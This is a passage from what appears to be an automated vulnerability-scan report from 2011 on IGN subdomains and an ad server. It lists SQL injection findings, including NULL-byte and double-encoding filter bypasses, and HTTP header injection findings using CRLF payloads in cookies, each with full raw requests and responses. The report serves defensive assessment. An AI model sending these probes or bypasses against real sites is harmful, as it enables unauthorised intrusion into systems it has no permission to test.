Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1595732039-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043784113v-1n-12mc+1297043784113mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 146050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

1.54. http://ps3.ign.com/index/psn-games.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ps3.ign.com
Path:   /index/psn-games.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /index/psn-games.html HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:57:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-1550130067-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:57:14 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043834114v-1n-12mc+1297043834114mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 189389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All PlayStation Ne
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /index/psn-games.html HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:57:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:57:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-1129407137-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:57:14 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043834739v-1n-12mc+1297043834739mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 184410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All PlayStation Ne
...[SNIP]...

1.55. http://ps3.ign.com/index/videos.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ps3.ign.com
Path:   /index/videos.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /index/videos.html HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-379166895-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:39 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043799833v-1n-12mc+1297043799833mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN PS3: Games, Ch
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET /index/videos.html HTTP/1.1
Host: ps3.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:56:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:56:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32464-1011077824-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:56:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043800449v-1n-12mc+1297043800449mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 128817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN PS3: Games, Ch
...[SNIP]...

1.56. http://xbox360.ign.com/ [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://xbox360.ign.com
Path:   /

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: xbox360.ign.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; NGUserID=a016c06-15003-1306593845-5; optimizelyBuckets=%7B%224875108%22%3A4948008%7D'; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715.3.10.1297040497; rsi_segs=10089

Response 1

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:45:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:45:58 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043158538v-1n-12mc+1297043158538mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 165579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Microsoft Xbox 360
...[SNIP]...
<SCRIPT LANGUAGE=VBScript\> \n');
document.write('on error resume next \n');
document.write('ShockMode = (IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.10")))\n');
document.write('<\/SCRIPT\>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: xbox360.ign.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; NGUserID=a016c06-15003-1306593845-5; optimizelyBuckets=%7B%224875108%22%3A4948008%7D''; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715.3.10.1297040497; rsi_segs=10089

Response 2

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:45:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:45:59 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043158972v-1n-12mc+1297043158972mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 160917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Microsoft Xbox 360
...[SNIP]...

2. HTTP header injection  previous  next
There are 18 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload cd1b1%0d%0a6f2d260b493 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204830&PluID=0&w=300&h=250&ord=bxzjkud,bguRrwbbdpjbz&ucm=true&z=100 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://xbox360.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0cd1b1%0d%0a6f2d260b493; A3=gLnTaeKR09sO00001h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gYRSaeKR09sO00001gL2MadKj0bdR00001fU+La50V0a+r00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gHrHaeKS09sO00001heXiaeru0c9M00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57dNH0000000002sZ8qav0000000001t58j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t384U10000000001t6852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=2657&BWDate=40580.349144&debuglevel=&FLV=10.1103&RES=128&WMPV=0cd1b1
6f2d260b493
; expires=Sat, 07-May-2011 20: 45:48 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001gL2MadKj0bdR00001gYRSaeKR09sO00001hghLaeWt09SF00001gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001fUFGa50V02WG00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001gHrHaeKS09sO00001cRreabeg03Dk00001heXiaeru0c9M00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; expires=Sat, 07-May-2011 20:45:48 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8qiu0000000001t67lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8mb20000000001t48i440000000001t28bwx0000000001t482790000000002t5852G0000000003sS8qav0000000001t57dNH0000000002sZ84ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t683xP0000000001sF8cVQ0000000001sV82980000000001t3852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; expires=Sat, 07-May-2011 20:45:48 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 07-May-2011 20:45:48 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 07 Feb 2011 01:45:47 GMT
Connection: close
Content-Length: 1768

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.2. http://cheats.ign.com/ [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload ee68c%0d%0ac5d9e961de2 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET / HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0ee68c%0d%0ac5d9e961de2; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:47:11 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043231442v-2n-12mc+1297043231442mv+2mn+12wwe~0ee68c
c5d9e961de2
;Path=/;Domain=.ign.com
Content-Length: 572974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.3. http://cheats.ign.com/index/cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 4e5e4%0d%0a2709aba0b1e was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~04e5e4%0d%0a2709aba0b1e; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:33 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043193880v-2n-12mc+1297043193880mv+2mn+12wwe~04e5e4
2709aba0b1e
;Path=/;Domain=.ign.com
Content-Length: 143576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.4. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/nintendo-ds-cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 9d002%0d%0ad6ae977a774 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/nintendo-ds-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~09d002%0d%0ad6ae977a774; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:27 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043187710v-2n-12mc+1297043187710mv+2mn+12wwe~09d002
d6ae977a774
;Path=/;Domain=.ign.com
Content-Length: 132462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.5. http://cheats.ign.com/index/pc-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/pc-cheats/index.html

Issue detail

